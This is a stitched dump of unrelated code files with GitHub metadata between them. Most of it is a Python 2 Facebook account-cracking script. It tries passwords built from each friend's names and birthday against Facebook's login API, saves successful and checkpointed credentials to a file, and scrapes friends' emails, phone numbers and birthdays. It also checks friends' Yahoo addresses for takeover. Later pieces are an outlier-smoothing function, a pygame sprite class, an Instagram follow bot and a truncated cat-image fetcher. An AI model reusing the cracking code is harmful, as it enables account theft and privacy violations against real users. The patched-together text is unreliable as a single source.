print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n'
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n'
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n'
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n'
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n'
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print("\033[1;96m[✓] \033[1;92mGROUP SAYA")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+str(id))
print("\033[1;96m[➹] \033[1;97mNama\033[1;91m: \033[1;92m"+str(nama) + '\n')
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def informasi():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
aid = raw_input('\033[1;96m[+] \033[1;93mMasukan ID/Nama\033[1;91m : \033[1;97m')
jalan('\033[1;96m[✺] \033[1;93mTunggu sebentar \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 43*"\033[1;96m="
try:
print '\033[1;96m[➹] \033[1;93mNama\033[1;97m : '+z['name']
except KeyError: print '\033[1;96m[?] \033[1;93mNama\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;96m[?] \033[1;93mID\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;96m[?] \033[1;93mEmail\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mNo HP\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;96m[?] \033[1;93mNo HP\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTempat tinggal\033[1;97m: '+z['location']['name']
except KeyError: print '\033[1;96m[?] \033[1;93mTempat tinggal\033[1;97m: \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTanggal lahir\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;96m[?] \033[1;93mTanggal lahir\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mSekolah\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mTidak ada'
except KeyError: pass
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
else:
pass
else:
print"\033[1;96m[✖] \x1b[1;91mAkun tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Clone dari teman"
print "\x1b[1;97m3.\x1b[1;93m Clone dari member group"
print "\x1b[1;97m4.\x1b[1;93m Clone dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama+ '\n')
save = open('out/MailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/TemanMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/GrupMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
save = open('out/MailVuln.txt','a')
save.write("Email: "+ mail + '\n\n')
save.close()
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__ == '__main__':
siapa()
| [
"noreply@github.com"
] | N0V4ID.noreply@github.com | |
d1ca03e375d629477112283390f4aec9f87f833e | 70f94eb2fc6190c97805f47c4268bece3d9fa0ba | /smoothing.py | 8155c566bfcf2252678294c6e976ee3a95d95778 | [] | no_license | DDJesus/smooth_avg | b8132172575c119047e33a39aa10459eaf500c11 | 976d41222a89f46c391c2c622725b3c9a3486661 | refs/heads/master | 2020-03-20T22:42:36.540241 | 2018-06-18T22:11:49 | 2018-06-18T22:11:49 | 137,811,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 599 | py | import numpy as np
test = [1000, 2000, 1570, 2100, 1170, 1860, 2060, 2080, 3100]
def smooth_avg(l, o):
new_l = l
outliers = o
count = 0
m = np.mean(new_l)
s = np.std(new_l, ddof=1)
max_n = 0
for x in range(len(new_l)):
item = new_l[x]
if item > m + s:
outliers.append(item)
new_l[x] = max_n
count += 1
else:
pass
if new_l[x] > max_n:
max_n = new_l[x]
if count == 0:
return outliers
else:
return smooth_avg(new_l, outliers)
print(smooth_avg(test, []))
| [
"noreply@github.com"
] | DDJesus.noreply@github.com |
be48ffa01aa280079ae37f24566d269afabbab18 | d2875f2518ebd8cb468a4752e56f99046047c52a | /dist/domain/role/huanggong/guan5.py | 20d17e60db72560f2d0d5e1b5727bf090a359ad2 | [] | no_license | tianyufighter/jiaofeiji_game | 6f5e73104424d04646e06ef5381e59ff62340cef | 728b57ad78b366efd166f425f72fb39496c598e8 | refs/heads/master | 2022-12-12T06:20:07.419641 | 2020-09-25T06:05:45 | 2020-09-25T06:05:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,771 | py | import random
import pygame
from dialog.huanggong.guan_dialog import GuanDialog
from role import DirAction
class Guan5(pygame.sprite.Sprite):
"""
士兵
"""
def __init__(self, x, y):
self.walk = DirAction("farmer55", "1394-8ddc27f7-", 4, 5, True)
self.pos_x = x
self.pos_y = y
self.width = 64
self.height = 93
self.dir = 0
self.step = 2
self.step_count = 0
self.stop = False
self.rect = pygame.Rect(self.pos_x, self.pos_y, self.width + 20, self.height + 20)
self.dialog = GuanDialog()
def draw(self, surface, x, y):
"""
绘制函数
:param surface: 背景
:param x: 窗口x坐标
:param y: 窗口y坐标
:return:
"""
image = self.walk.get_current_image(self.dir)
if self.stop:
surface.blit(self.dialog.surface, (self.pos_x - x, self.pos_y - y + self.height))
surface.blit(image, (self.pos_x - x, self.pos_y - y))
self.__move__()
def __move__(self):
if self.stop:
return
self.step_count += 1
if self.dir == 0:
self.pos_x += self.step
if self.pos_x < 0 or self.pos_x > (5760 - self.width):
self.pos_x -= self.step
self.pos_y += self.step
if self.pos_y > 0 or self.pos_y > (4320 - self.height):
self.pos_y -= self.step
elif self.dir == 1:
self.pos_x -= self.step
if self.pos_x < 0 or self.pos_x > (5760 - self.width):
self.pos_x += self.step
self.pos_y += self.step
if self.pos_y > 0 or self.pos_y > (4320 - self.height):
self.pos_y -= self.step
elif self.dir == 2:
self.pos_x -= self.step
if self.pos_x < 0 or self.pos_x > (5760 - self.width):
self.pos_x += self.step
self.pos_y -= self.step
if self.pos_y > 0 or self.pos_y > (4320 - self.height):
self.pos_y += self.step
elif self.dir == 3:
self.pos_x += self.step
if self.pos_x < 0 or self.pos_x > (5760 - self.width):
self.pos_x -= self.step
self.pos_y -= self.step
if self.pos_y > 0 or self.pos_y > (4320 - self.width):
self.pos_y += self.step
self.rect = pygame.Rect(self.pos_x, self.pos_y, self.width, self.height)
if self.step_count == 20:
self.step_count = 0
num = random.randrange(0, 4, 1)
self.dir = num
def isCollide(self, role):
if pygame.sprite.collide_rect(self, role):
self.stop = True
else:
self.stop = False
| [
"634522023@qq.com"
] | 634522023@qq.com |
ff8a299c9d32165282324d050f87b5e21287ec16 | 53d84da9cd7dd1d9b74383ca56061a50cc8b57c1 | /python3/bmi_main.py | 9370cf2a77360ebbf3aff5816719914f6755fa6c | [
"MIT"
] | permissive | yusufshakeel/Python-Project | 899be3fe5b709a19f98941137d49252566ebde98 | b6907fa5207952963e3c115f10a75adad4b095d4 | refs/heads/master | 2020-04-26T05:07:19.461418 | 2014-08-17T18:28:20 | 2014-08-17T18:28:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | from bmi import BMI #import BMI class from bmi module (file)
def main():
obj1 = BMI("Tom", 18, 145, 70) #create object
print("BMI for", obj1.getName(), "is", obj1.getBMI(), obj1.getStatus())
main() #call main function
| [
"yusufshakeel.in@gmail.com"
] | yusufshakeel.in@gmail.com |
f23c2757ed8e4ca90447aa22544c7b12337b52d2 | b3677987615b2948ec84c341ac06f1228aa66440 | /day_51-60/day_52/main.py | 4de54c3b3c125bc7ca7f4b933bd81c3927f36a03 | [] | no_license | MohamadHaziq/100-days-of-python | 38eb0ea90032fe771dc4974dbbd239c3ae46dcab | 1977d22566f76812a7df8806e52fa9b54527d144 | refs/heads/main | 2023-02-13T13:09:31.765007 | 2021-01-03T16:08:57 | 2021-01-03T16:08:57 | 314,592,788 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,228 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import ElementClickInterceptedException
import time
CHROME_DRIVER_PATH = "./chromedriver.exe"
SIMILAR_ACCOUNT = "insta"
USERNAME = "insta-email"
PASSWORD = "insta-pass"
class InstaFollower:
def __init__(self, path):
self.driver = webdriver.Chrome(executable_path=path)
def login(self):
self.driver.get("https://www.instagram.com/accounts/login/")
time.sleep(5)
username = self.driver.find_element_by_name("username")
password = self.driver.find_element_by_name("password")
username.send_keys(USERNAME)
password.send_keys(PASSWORD)
time.sleep(2)
password.send_keys(Keys.ENTER)
def find_followers(self):
time.sleep(5)
self.driver.get(f"https://www.instagram.com/{SIMILAR_ACCOUNT}")
time.sleep(2)
followers = self.driver.find_element_by_xpath('//*[@id="react-root"]/section/main/div/header/section/ul/li[2]/a')
followers.click()
time.sleep(2)
modal = self.driver.find_element_by_xpath('/html/body/div[4]/div/div/div[2]')
for i in range(10):
#In this case we're executing some Javascript, that's what the execute_script() method does.
#The method can accept the script as well as a HTML element.
#The modal in this case, becomes the arguments[0] in the script.
#Then we're using Javascript to say: "scroll the top of the modal (popup) element by the height of the modal (popup)"
self.driver.execute_script("arguments[0].scrollTop = arguments[0].scrollHeight", modal)
time.sleep(2)
def follow(self):
all_buttons = self.driver.find_elements_by_css_selector("li button")
for button in all_buttons:
try:
button.click()
time.sleep(1)
except ElementClickInterceptedException:
cancel_button = self.driver.find_element_by_xpath('/html/body/div[5]/div/div/div/div[3]/button[2]')
cancel_button.click()
bot = InstaFollower(CHROME_DRIVER_PATH)
bot.login()
bot.find_followers()
bot.follow() | [
"haziq.roslan@digitas.com"
] | haziq.roslan@digitas.com |
41b527071ce726caad5d3a7fbfab7a578b83c161 | 3cb67d0e1fbda4bb6a22d826c34d2eeb0d7283ed | /lolcat/cat_service.py | 65aa8458ba19de50d64b4aaf60f9583201d59282 | [] | no_license | kanr/python-jumpstart | dc6035877c87e5e6f873ada8abdc31067b43e4d0 | bb29ac2260c74e9910de993c9ad909bde62d3f36 | refs/heads/master | 2021-01-24T03:13:01.149078 | 2018-03-02T07:05:27 | 2018-03-02T07:05:27 | 122,880,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | #Connor aitken
import os
import shutil
import requests
def get_cat(folder, name):
url = 'http://consuming-python-services-api.azurewebsites.net/cats/random'
data = get_data_from_url(url)
save_image(folder, name, data)
def get_data_from_url(url):
response = requests.get(url, stream = True)
return response.raw
